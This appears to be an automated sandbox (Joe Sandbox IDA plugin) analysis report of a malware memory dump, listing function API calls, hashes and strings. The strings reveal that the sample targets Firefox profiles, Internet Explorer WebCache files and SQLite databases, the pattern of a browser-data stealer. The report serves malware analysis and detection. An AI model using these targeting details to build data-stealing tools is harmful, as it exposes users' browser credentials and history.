                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                                    • API String ID: 4039892925-3369679110
                                                                                                                                                                                                                                    • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2941347001-0
                                                                                                                                                                                                                                    • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                    • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                    • API String ID: 71295984-2036018995
                                                                                                                                                                                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2911713577-0
                                                                                                                                                                                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                    • API String ID: 2887208581-2114579845
                                                                                                                                                                                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(022F0048), ref: 0044DF01
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02300050), ref: 0044DF11
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00CD6DA8), ref: 0044DF21
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02300458), ref: 0044DF31
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
